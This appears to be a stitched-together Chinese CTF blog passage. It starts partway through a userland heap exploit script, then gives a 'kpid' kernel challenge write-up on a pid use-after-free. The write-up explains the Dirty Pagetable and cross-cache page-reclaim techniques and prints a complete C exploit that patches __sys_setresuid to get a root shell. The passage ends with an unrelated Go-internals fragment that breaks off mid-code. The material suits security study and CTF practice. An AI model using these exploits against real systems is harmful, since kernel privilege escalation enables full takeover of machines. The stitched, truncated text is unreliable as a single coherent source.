        payload += p64(map_start) + p64(map_end) + p64(map_end)
        payload += p64(0x21) + p16((map_metadata)%0x10000)

        sa("Content:",payload)
        sa("Buy?","y")
        sla("write:",str(0))
        sa("Write:",p8(hash(target)))
        sa("captain?","n")
        sla("captain?",str(target))
        sla("some?","b")
        # Bury one byte of addr per site.
        sla("bury?",str((addr >> (i*8)) & 0xff))


read(0x2a58,6)
libc_addr = (parts[1]<<8)+(parts[2]<<16)+(parts[3]<<24)+(parts[4]<<32)+(parts[5]<<40)
libc_base = libc_addr - 0xa5700
success("libc_addr >> "+hex(libc_addr))
success("libc_base >> "+hex(libc_base))

sla("Content length:",str(0x8))
payload = b"a"*0x8
sla("Content:",payload)
sa("Buy?","n")

sa("captain?","n")
sla("captain?",str(0x2a58+5))
sla("some?","n")

read(0x2ab0,8)
key = (parts[0])+(parts[1]<<8)+(parts[2]<<16)+(parts[3]<<24)+(parts[4]<<32)+(parts[5]<<40)+(parts[6]<<48)+(parts[7]<<56)
success("key >> "+hex(key))

read(0x3b48,6)
ld_addr = (parts[1]<<8)+(parts[2]<<16)+(parts[3]<<24)+(parts[4]<<32)+(parts[5]<<40)
ld_base = ld_addr - 0x39e00
success("ld_addr >> "+hex(ld_addr))
success("ld_base >> "+hex(ld_base))

fs_base = ld_base - 0x11f8c0
mmap_addr = ld_base + 0x37000
tls_dtor_list_addr = fs_base - 0x78
system_libc = libc_base + libc.sym["system"]
success("fs_base >> "+hex(fs_base))
success("tls_dtor_list_addr >> "+hex(tls_dtor_list_addr))
success("mmap_addr >> "+hex(mmap_addr))
success("system_libc >> "+hex(system_libc))

write(tls_dtor_list_addr-mmap_addr,heap_base+0x128f0,6)

sla("Content length:",str(0x20))
payload = b"a"*0x10+p64(rotate_left(system_libc^key,0x11))+p64(libc_base+0x1d8678)
sa("Content:",payload)
sa("Buy?","n")
sa("captain?","y")

p.interactive()

kpid

1
Linux version 6.1.75 (hyh@uu22) (Ubuntu clang version 17.0.6 (++20231209124227+6009708b4367-1~exp1~20231209124336.77), GNU ld (GNU Binutils for Ubuntu) 2.38) #2 SMP PREEMPT_DYNAMIC
1
2
3
4
5
6
7
8
9
10
11
#!/bin/sh
qemu-system-x86_64 \
-kernel bzImage \
-cpu qemu64,+smep,+smap,+rdrand \
-m 512M \
-smp 2 \
-initrd rootfs.cpio \
-append "console=ttyS0 quiet loglevel=3 oops=panic panic_on_warn=1 panic=-1 pti=on page_alloc.shuffle=1 kaslr" \
-monitor /dev/null \
-nographic \
-no-reboot
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/bin/sh
chown -R root:root /
chmod 400 /flag.txt
chmod -R 755 /dev
chmod -R 777 /tmp

mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs none /tmp
mount -t devtmpfs none /dev

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

chown -R ctf:ctf /home/ctf
insmod /kpid.ko
chmod 666 /dev/kpid
chmod 666 /dev/dma_heap/system

echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
cd /home/ctf
setsid /bin/cttyhack setuidgid ctf /bin/sh

umount /proc
umount /sys
poweroff -d 0 -f

漏洞分析

1
2
3
4
memset(buf.field_28, 0, sizeof(buf.field_28));
memset(&buf, 0, 0x20);
nr = kernel_clone(&buf);
pid = find_vpid((unsigned int)nr);
  • 内核模块会调用 kernel_clone,可以将这个功能当成一个 fork

漏洞点是 pid UAF:

1
2
3
4
5
6
7
if ( dest_cnt )
{
--dest_cnt;
put_pid(pid);
return 0LL;
}
return 0xFFFFFFFFFFFFFFEALL;
  • 释放了 pid 却没有释放该进程,导致后续可以通过该进程对 UAF slab 进行修改

题目给出提示:Dirty Pagetable

在 x86-64 Linux 中,通常使用 4 级页表将虚拟地址转换为物理地址

  • Dirty Pagetable 以 PTE(页表条目)为目标,这是物理内存之前的最后一个级别
  • 在 Linux 中,当需要新的 PTE 时,PTE 的页面也会使用 Buddy 系统进行分配

受害 pid 对象的计数字段与有效的 PTE 重合

1
2
3
4
5
6
7
8
9
10
11
12
13
struct pid
{
refcount_t count; /* 指向该数据结构的引用次数 */
unsigned int level;
spinlock_t lock;
/* lists of tasks that use this pid */
struct hlist_head tasks[PIDTYPE_MAX];
struct hlist_head inodes;
/* wait queue for pidfd notifications */
wait_queue_head_t wait_pidfd;
struct rcu_head rcu;
struct upid numbers[];
};
  • count 字段是 pid 对象的第一个字段(8 字节对齐),尽管 count 字段大小为 4 个字节,但它恰好与 PTE 的较低 4 字节重合,因此我们可以通过计数器来修改 PTE
  • 由于进程中的 fd 资源有限,它最多只能添加 32768 进行计数,为了打破这个限制,我们可以利用 fork 在多个进程中执行增量原语,此操作允许我们向受害者 PTE 添加足够大的数字

我们可以通过 mmap 来快速分配大量页表:

1
2
3
4
5
6
7
8
9
10
11
void *page_spray[N_PAGESPRAY];
for (int i = 0; i < N_PAGESPRAY; i++) {
page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
0x8000, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_ANONYMOUS, -1, 0);
if (page_spray[i] == MAP_FAILED) fatal("mmap");
}

for (int i = start; i < N_PAGESPRAY; i++)
for (int j = 0; j < 8; j++)
*(char*)(page_spray[i] + j*0x1000) = 'A' + j;
  • Linux 内核是惰性的,当 mmap 创建内存时并不会为其绑定页表,只有在第一次读写时才会通过缺页处理来进行绑定

在某些情况下,内核空间和用户空间需要共享一些物理页面,实现的机制很多但这里选择 dma-buf 系统堆:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* Open the dma-buf system heap. creat() takes a file mode as its second
 * argument, not open flags, and always opens write-only; open() with O_RDWR
 * is the call that was intended. */
dma_heap_fd = open("/dev/dma_heap/system", O_RDWR);
if (dma_heap_fd == -1)
    err_exit("open");

/* Request one 0x1000-byte buffer from the heap. On success the kernel
 * returns the new dma-buf file descriptor in data.fd. */
struct dma_heap_allocation_data data;
data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;

if (ioctl(dma_heap_fd, DMA_HEAP_IOCTL_ALLOC, &data) < 0) {
    perror("DMA_HEAP_IOCTL_ALLOC");
    return -1;
}
int dma_buf_fd = data.fd;
  • 共享页面由用户空间中的 dma_buf_fd 表示,可以通过 mmap 将共享页面映射到用户空间
  • 从 dma-buf 系统堆分配的共享页面基本上是从页面分配器分配的(实际上 dma-buf 子系统调整页面池进行优化,但这在利用时不会打扰我们,所以这里不再讨论)

入侵思路

由于开启了 CONFIG_SLAB_MERGE_DEFAULT 选项,UAF 对象 pid 和普通 slab 隔离,这里需要一种 Cross Cache UAF 的技术

  • 这里使用的技术和页级堆风水实现 Cross Cache Overflow 的有所不同
  • 但利用伙伴系统回收整个页面的思路是一致的

在 free victim slab 之后,free 掉同页面其他 object,再满足一系列条件就可以让整个 page 被 buddy system 回收:

  • 目标 object 所在的 page 不是 s->cpu_slab->page
  • 目标 object 所在 page 满足 page->pobjects > (s)->cpu_partial
  • 目标 object 所在 page 位于 freelist,且 page.inuse 为 “0”

触发方法:(参考文章:Linux 内核利用技巧: Slab UAF to Page UAF-安全客)

  • 创建一批 objects 占满 cpu_partial + 2 个 pages,保证 free 的时候 page->pobjects > (s)->cpu_partial
  • 创建 objects 占据一个新的 page,但不占满,保证 c->page 指向这个 page
  • free 掉目标 page 的所有 objects,使这个 page 的 page.inuse == 0
  • 剩下的每个 page free 一个 object 用完 partial list 后就会 free 掉目标 page

查看基本信息:

1
2
3
4
5
6
/home/ctf # cat /sys/kernel/slab/pid/object_size // 每个object的大小
112
/home/ctf # cat /sys/kernel/slab/pid/objs_per_slab // 每个slab中可容纳多少object
32
/home/ctf # cat /sys/kernel/slab/pid/cpu_partial // cpu partial list最大阈值
120
  • 可以通过 sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) 将 cpu_partial 降低为“8”

入侵的第一步是整理 pid slab,为此我们需要大量调用 fork 来申请足够的 pid 直到 pid slab 耗尽,进而向伙伴系统申请空间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* Fork 2 * objs_per_slab children so that their pid objects take up two pid
 * slab pages. Each child blocks on its own pipe until the parent writes a
 * byte, and exits when that byte is 'C'. */
for (int i = 0; i < 2 * objs_per_slab; i++) { // alloc 2 pages
    child_pid[i] = fork();
    if (child_pid[i] < 0) {
        err_exit("fork");
    }
    else if (child_pid[i] > 0) {
        /* sleep() takes whole seconds as unsigned int, so sleep(0.01) was
         * truncated to sleep(0). usleep() gives the intended 10 ms pause. */
        usleep(10 * 1000);
        continue;
    }
    else {
        char sync;
        read(normal_pipe[i][0], &sync, 1);
        if (sync == 'C') {
            exit(-1);
        }
    }
}
  • 先申请 2 个 page 大小的 pid slab

接下来可以调用内核模块的 UAF,申请剩下 cpu_partial 个 page 大小的 pid slab:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
kernel_fork();
if(pid == getpid()){ // parent
kernel_dele();

/* <----- 保证 free 的时候 page->pobjects > (s)->cpu_partial -----> */
/* Fork the remaining children (indices 2 * objs_per_slab .. PID_NUM - 1).
 * Each child blocks on its pipe and acts on the byte the parent sends:
 *   'C' exits;
 *   'A' calls add_to_refcount(128, listensock) and then idles;
 *   'B' calls add_to_refcount(127, listensock) and then idles. */
for (int i = 2 * objs_per_slab; i < PID_NUM; i++) { // alloc cpu_partial pages
    child_pid[i] = fork();
    if (child_pid[i] < 0) {
        err_exit("fork");
    }
    else if (child_pid[i] > 0) {
        /* sleep() takes whole seconds as unsigned int, so sleep(0.01) was
         * truncated to sleep(0). usleep() gives the intended 10 ms pause. */
        usleep(10 * 1000);
        continue;
    }
    else {
        char sync;
        read(normal_pipe[i][0], &sync, 1);
        if (sync == 'C') {
            exit(-1);
        }
        else if (sync == 'A') {
            add_to_refcount(128, listensock);
            while (1) sleep(1);
        }
        else if (sync == 'B') {
            add_to_refcount(127, listensock);
            while (1) sleep(1);
        }
    }
}
/* ------------------------------------------------------------ */

void *page_spray[N_PAGESPRAY];
for (int i = 0; i < N_PAGESPRAY; i++) {
page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
0x8000, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_ANONYMOUS, -1, 0);
if (page_spray[i] == MAP_FAILED)
err_exit("mmap");
}

......

}
else{ // child
char sync;
read(child_pid[0], &sync, 1);
if (sync == 'C') {
prctl(PR_SET_PDEATHSIG, SIGKILL);
/* create post-death-incrementable pid reference */
listen(listensock, 128 /*SOMAXCONN*/);
write(child_pid[1], "D", 1);
while (1) {
sleep(1);
}
}
}
  • UAF slab 将会是这些页面中的其中一个 pid
  • 这里选择使用 AF_UNIX socket 来修改 pid->count
    • 子进程开启监听
    • 父进程通过 connect 来增加 pid->count
  • 由内核模块生成的子进程将是控制 UAF slab 的关键,需要专门创建两个管道来维持父子进程的通信

接下来我们需要将 UAF pid 释放掉,并用 PTE 将其覆盖,主要就是满足 pid page 被伙伴系统回收的条件:

1
2
3
4
5
6
/* <----- free 掉目标 page 的所有 objects && 剩下的每个 page free 一个 object -----> */
/* Tell the first objs_per_slab * (cpu_partial - 1) + 1 children to exit by
 * sending 'C' on their pipes, one every 200 ms. */
for (int i = 0; i < objs_per_slab * (cpu_partial-1) + 1; i++) { // free cpu_partial-1 pages + 1 pid
    /* sleep(0.2) truncates to sleep(0); usleep() gives the intended delay. */
    usleep(200 * 1000);
    write(normal_pipe[i][1], "C", 1);
}
/* ----------------------------------------------------------------------------- */
  • 被伙伴系统回收的条件即将满足(除了最后一个 page 为半满,其他的都为空)
1
2
3
4
5
6
7
8
9
10
11
/* Release the children objs_per_slab * 7 + 1 .. objs_per_slab * 8 - 1 one at
 * a time. After each release, touch the next N_PADDINGS sprayed mappings
 * (8 pages each) so that they are faulted in. */
int start = 0;
for (int i = objs_per_slab * 7 + 1; i < objs_per_slab * 8; i++) {
    /* sleep(0.2) truncates to sleep(0); usleep() gives the intended delay. */
    usleep(200 * 1000);
    printf("i = %d\n",i);
    write(normal_pipe[i][1], "C", 1);

    /* The inner index is named k so it no longer shadows the outer i. */
    for (int k = start; k < start + N_PADDINGS; k++)
        for (int j = 0; j < 8; j++)
            *(char*)(page_spray[k] + j*0x1000) = 'A' + j;
    start += N_PADDINGS;
}
  • 接下来释放的每一个 pid 都有可能导致带有 UAF pid 的 page 被伙伴系统回收
  • 我们需要一边释放一边用 PTE 来占用 UAF pid

现在可控的 UAF pid 已经被某个 PTE 占据,我们可以先用增量原语修改这个 PTE 条目,然后将命中的 PTE 堆喷出来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/* Send 'A' to 31 children and 'B' to one more, 200 ms apart. */
for (int i = objs_per_slab * 8; i < objs_per_slab * 9 - 1; i++) { // 128*31 + 127 = 4095
    /* sleep(0.2) truncates to sleep(0); usleep() gives the intended delay. */
    usleep(200 * 1000);
    write(normal_pipe[i][1], "A", 1);
}
usleep(200 * 1000);
write(normal_pipe[(objs_per_slab * 9 - 1)][1], "B", 1);

sleep(1);

void *evil = NULL;
for (int i = 0; i < N_PAGESPRAY; i++) {
//print_hex(page_spray[i],8);
if (*(char*)(page_spray[i]) != 'A') {
evil = page_spray[i];
printf("Found overlapping page: %p\n", evil);
break;
}
}
if (evil == NULL)
err_exit("target not found :(");

使用 munmap 释放 PTE,然后用 dma-buf 占据 UAF pid:

1
2
3
4
5
6
7
8
9
10
11
munmap(evil, 0x1000);
void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, dma_data_fd, 0);
*(char*)dmabuf = '0';

/* Send 'A' to the next objs_per_slab children, 200 ms apart. */
for (int i = objs_per_slab * 9 ; i < objs_per_slab * 10; i++) { // 128*32 = 4096
    /* sleep(0.2) truncates to sleep(0); usleep() gives the intended delay. */
    usleep(200 * 1000);
    write(normal_pipe[i][1], "A", 1);
}

sleep(1);
printf("DMA-BUF now points to PTE: 0x%lx\n", *(size_t*)dmabuf);

如果我们执行增量原语,将 0x1000、0x2000、0x3000 等添加到受害者 PTE 中,我们将有很大的机会使受害者 PTE 与用户页表相关联:

1711709601881

  • 通过增量使 victim PTE 索引到另一个 PTE
  • 该 PTE 极有可能为 page_spray[i] 中某个页面的页表项

通过 victim PTE 修改页表项为内核代码段的页表项,堆喷并泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
char *victim_ptable = NULL;
*(size_t*)dmabuf = 0x800000000009c067;
for (int i = 0; i < N_PAGESPRAY; i++) {
if (page_spray[i] == evil) continue;
if (*(size_t*)page_spray[i] > 0xffff) {
victim_ptable = page_spray[i];
printf("Found victim page table: %p\n", victim_ptable);
break;
}
}

size_t phys_base = ((*(size_t*)victim_ptable) & ~0xfff) - PHYSICAL_OFFSET;
printf("Physical kernel base address: 0x%lx\n", phys_base);

最后调整好偏移,修改 setresuid 函数的权限检查逻辑即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdint.h>
#include <ctype.h>
#include <sys/un.h>

#include "kernelpwn.h"

/* Kernel virtual address that the offsets below are measured from. */
#define STARTUP_64 (0xffffffff81000000UL)
/* Offset of __sys_setresuid from STARTUP_64; the address is hard-coded, so it only fits one kernel build. */
#define __SYS_SETRESUID_OFF (0xffffffff81096ac0 - STARTUP_64) // __sys_setresuid -- 0xffffffff81096ac0
/* Offset, relative to __sys_setresuid, of the second opcode byte of the conditional jump that main() overwrites. */
#define PATCH_JNE_OFFSET (0xffffffff81096bfd + 1 - STARTUP_64 - __SYS_SETRESUID_OFF) // je: 0x0f, 0x84

/* ioctl request number used by init_dma_buf() on the DMA heap device. */
#define DMA_HEAP_IOCTL_ALLOC 0xc0184800
/* Subtracted from the masked entry read in main() to obtain the kernel's physical base address. */
#define PHYSICAL_OFFSET 0x1c04000

/* Slab geometry the exploit assumes for the targeted cache -- NOTE(review): values are specific to the target kernel; confirm before reuse. */
#define object_size 112
#define objs_per_slab 32
#define cpu_partial 8

int fd;
int dma_heap_fd;
int dma_data_fd;
int listensock;
int pid;

/* Argument block passed by address to every ioctl issued on the /dev/kpid descriptor. */
struct argg {
char* buf; /* user buffer pointer; only kernel_show() passes a non-NULL value */
};

void kernel_fork()
{
struct argg arg = { .buf = 0};
ioctl(fd, 0x47001, &arg);
}

void kernel_dele()
{
struct argg arg = { .buf = 0 };
ioctl(fd, 0x69003, &arg);
}

void kernel_show(char* buf)
{
struct argg arg = { .buf = buf };
ioctl(fd, 0x58002, &arg);
}

/* Address of the AF_UNIX socket shared by init_socket() (bind) and add_to_refcount() (connect). */
struct sockaddr_un unix_addr = {
.sun_family = AF_UNIX,
.sun_path = "/tmp/exploitsocket"};

/*
 * Create the AF_UNIX stream socket stored in the global `listensock` and bind
 * it to `unix_addr`.
 *
 * Returns 0 on success. The original fell off the end of a non-void function
 * and ignored socket()/bind() failures; failures now go through err_exit()
 * like the other setup helpers in this file.
 */
int init_socket(){
    listensock = socket(AF_UNIX, SOCK_STREAM, 0);
    if (listensock == -1)
        err_exit("socket");

    /* Remove a socket file left over from an earlier run so that bind() can succeed. */
    unlink(unix_addr.sun_path);
    if (bind(listensock, (struct sockaddr *)&unix_addr, sizeof(unix_addr)) == -1)
        err_exit("bind");

    return 0;
}

/*
 * Open `count` connections to `unix_addr` and accept each one on `listensock`.
 *
 * None of the descriptors is closed, so every connection stays alive for the
 * lifetime of the calling process. NOTE(review): per the function name, each
 * accepted connection is expected to add one to a kernel reference count.
 * The `listensock` parameter shadows the global of the same name.
 */
void add_to_refcount(int count, int listensock)
{
    int remaining = count;

    while (remaining-- > 0) {
        int client = socket(AF_UNIX, SOCK_STREAM, 0);

        connect(client, (struct sockaddr *)&unix_addr, sizeof(unix_addr));
        accept(listensock, NULL, NULL);
    }
}

/* Argument block for DMA_HEAP_IOCTL_ALLOC; declared locally instead of including the kernel UAPI header. */
struct dma_heap_allocation_data {
uint64_t len; /* requested size in bytes (init_dma_buf() asks for 0x1000) */
uint32_t fd; /* read back by init_dma_buf() after the ioctl as the new dma-buf descriptor */
uint32_t fd_flags; /* open flags for that descriptor (O_RDWR here) */
uint64_t heap_flags; /* set to 0 by init_dma_buf() */
};

/*
 * Open the system DMA heap and allocate one 0x1000-byte dma-buf from it.
 *
 * The heap descriptor is kept in the global `dma_heap_fd`.
 * Returns the dma-buf file descriptor, or -1 if the allocation ioctl fails.
 *
 * The original called creat(path, O_RDWR): creat() takes a permission mode,
 * not open flags, and always opens write-only with O_CREAT|O_TRUNC. open() is
 * the call that matches the intent of getting a read/write descriptor.
 */
int init_dma_buf(){
    dma_heap_fd = open("/dev/dma_heap/system", O_RDWR);
    if (dma_heap_fd == -1)
        err_exit("open");

    struct dma_heap_allocation_data data;
    data.len = 0x1000;
    data.fd_flags = O_RDWR;
    data.heap_flags = 0;
    data.fd = 0; /* filled in by the ioctl */

    if (ioctl(dma_heap_fd, DMA_HEAP_IOCTL_ALLOC, &data) < 0) {
        perror("DMA_HEAP_IOCTL_ALLOC");
        return -1;
    }
    return data.fd;
}

/* Number of helper children forked by main(). */
#define PID_NUM ((cpu_partial+2) * objs_per_slab) // fills cpu_partial + 2 pages
/* Number of spray regions main() touches after each released helper. */
#define N_PADDINGS (objs_per_slab * 6)
/* Total number of spray regions main() maps. */
#define N_PAGESPRAY (N_PADDINGS * 20 * 2)

int child_pid[PID_NUM]; /* fork() result for each helper, indexed like normal_pipe */
int parent_pipe[2]; /* child -> parent notification ('D') */
int child_pipe[2]; /* parent -> child notification ('C') */
int normal_pipe[PID_NUM][2]; /* one command pipe per helper child ('A', 'B' or 'C') */

/*
 * Create every pipe the exploit uses: the two parent/child synchronisation
 * pipes and one command pipe per helper child.
 *
 * Returns 0 on success. The original had no return statement in a non-void
 * function and did not check the first two pipe() calls; any failure now
 * goes through err_exit().
 */
int init_pipe(){
    if (pipe(parent_pipe) == -1) // parent
        err_exit("pipe");
    if (pipe(child_pipe) == -1) // child
        err_exit("pipe");

    for (int i = 0; i < PID_NUM; i++) {
        if (pipe(normal_pipe[i]) == -1) {
            err_exit("pipe");
        }
    }
    return 0;
}

/*
 * Exploit entry point.
 *
 *  1. Fork 2 * objs_per_slab helper children, each blocked on its own normal_pipe.
 *  2. Call kernel_fork(); the process whose pid is unchanged continues as the
 *     parent, the other one as the child.
 *  3. Parent: kernel_dele(), fork the remaining helpers, map the spray regions,
 *     release helpers with 'C' while touching the spray pages, then wake the
 *     'A'/'B' helpers whose add_to_refcount() calls act as the increment primitive.
 *  4. Parent: find the spray region whose content changed, replace it with a
 *     dma-buf mapping, rewrite page-table entries through that mapping, derive
 *     the kernel's physical base, patch the conditional jump inside
 *     __sys_setresuid and start a shell.
 *  Child: wait for 'C', listen() on listensock, answer 'D', then sleep forever.
 *
 * Changes from the original: sleep(0.2)/sleep(0.01) truncated to sleep(0)
 * because sleep() takes whole seconds, so the intended pauses are now done with
 * usleep(); victim_ptable is checked before it is dereferenced.
 */
int main(int argc, char** argv, char** envp)
{
    bind_core(0); /* helper from kernelpwn.h; presumably pins the process to CPU 0 */

    fd = open("/dev/kpid", O_RDWR);
    if (fd == -1)
        err_exit("open");

    init_pipe();
    init_socket();

    /* Ignore SIGCHLD with SA_NOCLDWAIT so that exiting helpers are never waited for. */
    struct sigaction act;
    act.sa_handler = SIG_IGN;
    sigemptyset(&act.sa_mask);
    act.sa_flags = SA_NOCLDWAIT;
    sigaction(SIGCHLD, &act, NULL);

    pid = getpid();

    for (int i = 0; i < 2 * objs_per_slab; i++) { // alloc 2 pages
        child_pid[i] = fork();
        if (child_pid[i] < 0) {
            err_exit("fork");
        }
        else if (child_pid[i] > 0) {
            usleep(10 * 1000); /* was sleep(0.01), i.e. no delay at all */
            continue;
        }
        else {
            /* Helper child: block until the parent sends a command byte. */
            char sync;
            read(normal_pipe[i][0], &sync, 1);
            if (sync == 'C') {
                exit(-1);
            }
        }
    }

    kernel_fork();
    if (pid == getpid()) { // parent
        kernel_dele();

        /* <----- make sure that page->pobjects > (s)->cpu_partial at free time -----> */
        for (int i = 2 * objs_per_slab; i < PID_NUM; i++) { // alloc cpu_partial pages
            child_pid[i] = fork();
            if (child_pid[i] < 0) {
                err_exit("fork");
            }
            else if (child_pid[i] > 0) {
                usleep(10 * 1000); /* was sleep(0.01) */
                continue;
            }
            else {
                /* Helper child: 'C' = exit, 'A' = 128 connections, 'B' = 127 connections. */
                char sync;
                read(normal_pipe[i][0], &sync, 1);
                if (sync == 'C') {
                    exit(-1);
                }
                else if (sync == 'A') {
                    add_to_refcount(128, listensock);
                    while (1) sleep(1);
                }
                else if (sync == 'B') {
                    add_to_refcount(127, listensock);
                    while (1) sleep(1);
                }
            }
        }
        /* ------------------------------------------------------------ */

        /* Reserve N_PAGESPRAY shared anonymous regions of 8 pages each at fixed, 0x10000-spaced addresses. */
        void *page_spray[N_PAGESPRAY];
        for (int i = 0; i < N_PAGESPRAY; i++) {
            page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
                                 0x8000, PROT_READ|PROT_WRITE,
                                 MAP_SHARED|MAP_ANONYMOUS, -1, 0);
            if (page_spray[i] == MAP_FAILED)
                err_exit("mmap");
        }

        /* <----- free every object of the target page && free one object in each remaining page -----> */
        for (int i = 0; i < objs_per_slab * (cpu_partial-1) + 1; i++) { // free cpu_partial-1 pages + 1 pid
            usleep(200 * 1000); /* was sleep(0.2) */
            write(normal_pipe[i][1], "C", 1);
        }
        /* ----------------------------------------------------------------------------- */

        sleep(1);

        /* Release the rest of that page one helper at a time, touching a fresh
         * batch of spray regions after each release. */
        int start = 0;
        for (int i = objs_per_slab * 7 + 1; i < objs_per_slab * 8; i++) {
            usleep(200 * 1000); /* was sleep(0.2) */
            printf("i = %d\n",i);
            write(normal_pipe[i][1], "C", 1);

            for (int k = start; k < start + N_PADDINGS; k++)
                for (int j = 0; j < 8; j++)
                    *(char*)(page_spray[k] + j*0x1000) = 'A' + j;
            start += N_PADDINGS;
        }

        sleep(1);

        dma_data_fd = init_dma_buf();

        /* Touch every spray region that the loop above did not reach. */
        for (int i = start; i < N_PAGESPRAY; i++)
            for (int j = 0; j < 8; j++)
                *(char*)(page_spray[i] + j*0x1000) = 'A' + j;

        /* Tell the kernel_fork() child to start listening and wait for its 'D' reply. */
        write(child_pipe[1], "C", 1);
        while (1) {
            char sync;
            read(parent_pipe[0], &sync, 1);
            if (sync == 'D') {
                break;
            }
        }

        for (int i = objs_per_slab * 8; i < objs_per_slab * 9 - 1; i++) { // 128*31 + 127 = 4095
            usleep(200 * 1000); /* was sleep(0.2) */
            write(normal_pipe[i][1], "A", 1);
        }
        usleep(200 * 1000); /* was sleep(0.2) */
        write(normal_pipe[(objs_per_slab * 9 - 1)][1], "B", 1);

        sleep(1);

        /* The region whose first byte is no longer the 'A' marker is the overlapping one. */
        void *evil = NULL;
        for (int i = 0; i < N_PAGESPRAY; i++) {
            //print_hex(page_spray[i],8);
            if (*(char*)(page_spray[i]) != 'A') {
                evil = page_spray[i];
                printf("Found overlapping page: %p\n", evil);
                break;
            }
        }
        if (evil == NULL)
            err_exit("target not found :(");

        /* Swap the first page of that region for a mapping of the dma-buf. */
        munmap(evil, 0x1000);
        void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, dma_data_fd, 0);
        *(char*)dmabuf = '0';

        for (int i = objs_per_slab * 9 ; i < objs_per_slab * 10; i++) { // 128*32 = 4096
            usleep(200 * 1000); /* was sleep(0.2) */
            write(normal_pipe[i][1], "A", 1);
        }

        sleep(1);
        printf("DMA-BUF now points to PTE: 0x%lx\n", *(size_t*)dmabuf);

        char *victim_ptable = NULL;
        /* Entry for physical page 0x9c000, flag bits 0x67, bit 63 set. */
        *(size_t*)dmabuf = 0x800000000009c067;
        for (int i = 0; i < N_PAGESPRAY; i++) {
            if (page_spray[i] == evil) continue;
            if (*(size_t*)page_spray[i] > 0xffff) {
                victim_ptable = page_spray[i];
                printf("Found victim page table: %p\n", victim_ptable);
                break;
            }
        }
        /* Without this check a failed search would dereference NULL just below. */
        if (victim_ptable == NULL)
            err_exit("victim page table not found :(");

        size_t phys_base = ((*(size_t*)victim_ptable) & ~0xfff) - PHYSICAL_OFFSET;
        printf("Physical kernel base address: 0x%lx\n", phys_base);

        /* Re-point the controlled entry at the physical page that holds __sys_setresuid. */
        size_t phys_func = phys_base + __SYS_SETRESUID_OFF;
        *(size_t*)dmabuf = (phys_func & ~0xfff) | 0x8000000000000067;

        // 84 0E 01 00 00 E8 18 73 01 00 48 85 C0 0F 84 CD
        print_hex(victim_ptable + ((__SYS_SETRESUID_OFF + PATCH_JNE_OFFSET) & 0xfff), 0x10);
        victim_ptable[(__SYS_SETRESUID_OFF + PATCH_JNE_OFFSET) & 0xfff] = 0x85; // jne
        print_hex(victim_ptable + ((__SYS_SETRESUID_OFF + PATCH_JNE_OFFSET) & 0xfff), 0x10);
        // getchar();

        printf("Whoami");
        system("id");
        setresuid(0, 0, 0);

        system("/bin/sh");
    }
    else { // child
        char sync;
        read(child_pipe[0], &sync, 1);
        if (sync == 'C') {
            /* Die together with the parent. */
            prctl(PR_SET_PDEATHSIG, SIGKILL);
            /* create post-death-incrementable pid reference */
            listen(listensock, 128 /*SOMAXCONN*/);
            write(parent_pipe[1], "D", 1);
            while (1) {
                sleep(1);
            }
        }
    }

    return 0;
}

Go 是一种新的语言,一种并发的、带垃圾回收的、快速编译的语言,结合了解释型语言的游刃有余,动态类型语言的开发效率,以及静态类型的安全性

查看二进制文件的 go 语言版本:

1
go version test

数据结构

基本类型

1
2
3
4
5
6
7
8
9
10
11
12
13
package main

import "log"

// main declares one value of each basic kind and prints them all through a
// single log.Fatalf call, which logs the formatted line and then exits.
func main() {
	var (
		i      = 1234
		j      = int32(1)
		f      = float32(3.14)
		bytes  = [5]byte{'h', 'e', 'l', 'l', 'o'}
		primes = [4]int{2, 3, 5, 7}
	)

